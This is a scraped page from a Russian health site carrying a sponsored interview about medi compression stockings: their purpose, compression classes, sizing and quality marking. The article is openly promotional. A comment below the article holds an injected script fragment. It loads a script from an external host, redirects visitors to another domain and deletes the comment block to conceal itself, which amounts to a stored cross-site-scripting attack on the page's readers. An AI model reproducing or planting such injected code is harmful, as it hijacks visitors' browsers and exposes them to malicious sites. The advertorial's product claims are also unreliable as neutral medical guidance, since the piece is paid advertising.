Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  «Скорая помощь» для устал...  >>  «Скорая помощь» для усталых ног
 
Обратная связь
 

«Скорая помощь» для усталых ног

Размер шрифта
13 марта 2012 00:00
  • google_analytics: false
  • Нравится

Вещь, которая пригодится и в путешествии, и при занятиях спортом, и на работе. В больнице она требуется на операцию. Она тем более необходима для тех, кто страдает варикозом. Знакомьтесь: медицинский компрессионный трикотаж! Зачем он нужен медицинский компрессионный трикотаж, и как его правильно выбирать? Отвечает на эти вопросы директор по развитию российского подразделения компании medi (Германия) Артюх Игорь Валентинович.

1 

– Игорь Валентинович, сейчас очень много говорят о компрессионном трикотаже – гольфах, чулках, колготках. Зачем он нужен?


Компрессионный трикотаж помогает восстановить венозный отток от нижних конечностей, увеличить скорость кровотока в венах и улучшить отток крови от тканей.

– Получается, что компрессионный трикотаж помогает от варикоза?


Смотря, что вы понимаете под словом «помогает». Компрессионный трикотаж – не альтернатива лечению варикоза. Единственный способ справиться с варикозом – удалить поврежденные вены. Но если человек с варикозным расширением вен нижних конечностей носит такие изделия – ему становится легче. А главное – под вечер не возникает отечность тканей, ноги меньше устают.

– У здоровых людей, бывает, что под вечер ноги устают и отекают. Им тоже необходим компрессионный трикотаж?


Я бы сказал так: трикотаж первого класса компрессии поможет и здоровым людям. Ведь отечность ног есть у половины работоспособного населения, работающего на ногах.

– И у тех, кто целый день сидит... 


Да. Физиологическое давление, создаваемое компрессионным трикотажем, тоже сильно облегчает жизнь. Кроме того, проблемы с отечностью и усталостью ног часто беспокоят людей с лишним весом.

– Говорят, что компрессионный трикотаж уменьшает риск тромбозов при авиаперелетах...

1Теснота и недостаток движения – основные причины возникновения тромбоза глубоких вен голени, известного как «тромбоз путешественника» или «синдром длительных путешествий». В группу риска попадают те, кто летает на дальние расстояния, ездит в сидячих вагонах или просто долго находится за рулем.

– В этом случае также поможет трикотаж первого класса компрессии?


Не только. Сейчас создан специальный компрессионный трикотаж для путешествий – гольфы mediven travel.

Он разработан для тех, кто долго находятся в сидячем положении без движения. В первую очередь я бы рекомендовал его людям со склонностью к тромбозам и отекам ног.

– А если путешествуешь на своих двоих?

Тут больше подойдут компрессионные гольфы mediven motion. Они для людей, которые активно двигаются и хотят подстраховать и защитить свои вены. Материал, из которого сделаны эти гольфы, более жесткий и менее растяжимый: он не столько поддерживает внешнее давление в покое, сколько помогает мышечно-венозной помпе голени при ходьбе или беге.

– Игорь Валентинович, эти виды компрессионного трикотажа должен назначать врач?

Назначения врача тут не требуется. Оно необходимо для трикотажа с более высокой степенью компрессии: для второго или третьего класса. Второй показан для людей с неосложненным варикозом, третий – при варикозе с трофическими расстройствами.

- Кроме обычного компрессионного трикотажа существует еще и госпитальный.

– Судя по названию, он для тех, кто госпитализирован?


Да. Такие люди двигаются мало, все больше лежат, а, следовательно, попадают в группу риска по тромбозам и тромбоэмболиям. Главная цель применения антиэмболического трикотажа mediven thrombexin 18 – увеличить скорость венозного оттока от нижних конечностей и, таким образом, снизить риск возникновения тромбоза. Этот вид трикотажа используется в качестве чулков для родов и любых оперативных вмешательств.


– Вместо эластичных бинтов?


Да. Трикотаж в этом плане надежнее. Бинт, конечно, в какой-то мере ускоряет кровоток, но с помощью бинта тяжело создать правильный физиологический профиль давления, к тому же бинт сползает, когда пациент двигается. Кстати, в Европе страховые компании требуют, чтобы пациенты, ложась на операцию или в стационар, пользовались компрессионным трикотажем.

1– Это оправдано?


По поводу применения госпитального трикотажа проведено множество исследований. Результаты одного из них были опубликованы в 2004 году в British Journal of Surgery (2004; 91: 842-847). Исследование показало, что госпитальные чулки позволяют свести к минимуму развитие тромбоза глубоких вен. А ведь эти осложнения до сих пор одна из главных причин послеоперационной смертности...

– А после операций на венах?


Компрессионные чулки mediven struva надевают на ногу сразу после операции, чтобы избежать гематом и снизить риск тромбозов. Носить их обязательно: они обеспечивает профилактику дальнейшего развития варикоза.

– На этом с классификацией компрессионного трикотажа можно закончить?


Существует совершенно отдельный вид компрессионного трикотажа, который используется в лимфологии для борьбы с лимфатическими отеками. Трикотаж в этом случае выполняет функцию бандажа – у него низкая степень растяжимости, он держит форму и изготавливается четко под пациента. По меркам. Индивидуально.



– Игорь Валентинович, обычные колготки, чулки и гольфы подбирают по размеру, а как подбирают компрессионные?


Тоже по размеру. И тут размер имеет гораздо большее значение. Размер подбирается строго по индивидуальным анатомическим меркам. Компрессионные колготки должны создавать физиологический профиль давления: 100% – над лодыжками, 70% – на уровне верхней трети голени, 40% – на уровне верхней трети бедра. Такое распределение давления с постепенным убыванием от лодыжек к бедру стимулирует движение крови по направлению к сердцу.

Теперь представьте, что будет, если компрессионный трикотаж не будет соответствовать анатомическим особенностям ноги. На слишком узкой щиколотке давление будет ниже необходимого, на слишком широкой – выше, то же самое с голенью и бедром. А если еще и длина не совпадает...

– Но ведь ноги у всех разные, как же быть?


Крупные компании по производству компрессионного трикотажа идут навстречу потребителю и делают большую шкалу размеров, чтобы предусмотреть как можно больше анатомических особенностей. Так у компании medi стандартных размеров семь, а еще они различаются по длине. Но даже в этом случае 10% людей оказываются «за бортом». Им необходимо делать изделие на заказ. Конечно, индивидуальный трикотаж стоит дороже серийной продукции.



1– На что еще, кроме размера, стоит обратить внимание при выборе компрессионного трикотажа?


На наличие значка RAL на упаковке и на ярлыке, вшитом в изделие. Это знак качества компрессионного белья. Гарантия того, что физиологический профиль давления будет соблюден, причем заявленные компрессионные свойства лечебного трикотажа сохранятся в течение шести месяцев при условии ежедневного использования и ежедневной стирки.

– То есть прежде чем поставить знак RAL, изделия тестируются?


И очень тщательно. Тестированием занимается специальный институт в Германии.

– Как происходит проверка?


Изделия изымаются из разных партий товара наугад, а затем на специальном оборудовании проверяются на компрессионные свойства и градиент давления. Если на электронных анатомических лекалах в заданных размерах требуемый уровень давления и его физиологический профиль сохранен, то компания получает этот знак на один год. Если проверка выявит несоответствие – это то же самое, что открыто заявить «наши изделия не всегда соответствуют медицинским стандартам». 


– Позору не оберешься...


Именно поэтому каждая компания по производству компрессионного трикотажа решает сама – проводить тестирование или нет. Это дело добровольное.

– Игорь Валентинович, с одной стороны, понятно, что компрессионный трикотаж нужен многим, с другой – так не хочется, чтобы окружающие замечали на ногах лечебные чулки...


Современный компрессионный трикотаж по внешнему виду не отличается от обычного. На ноге он смотрится просто как красивые чулки (колготки, гольфы) высокого качества.

Есть чрезвычайно тонкий и прозрачный трикотаж, есть с узорами, цветовая гамма – на любой вкус. Сейчас на западе очень популярна новинка – компрессионные чулки с кристаллами Swarovski.

– Прелесть какая... А как они в носке?

Как я уже говорил, с точки зрения медицинских свойств, компрессионные изделия препятствуют возникновению отечности и снижают усталость ног. Кроме того, в трикотаже производства компании medi есть система выведения влаги и воздухообмена, то есть поддерживается оптимальный водный и температурный баланс. Волокна высокой степени очистки не раздражают даже чувствительную кожу. Включение солей серебра в структуру нитей в носочной части, препятствуют размножению бактерий и появлению неприятного запаха. Все эти полезные свойства трикотажа не исчезают при стирке. 


– Ну и последний вопрос: что выбрать – гольфы или чулки?


Гольфы чаще используют для профилактики, если варикозная болезнь не затронула бедро. Но если сомневаетесь, лучше спросите у врача флеболога.


Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:50

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.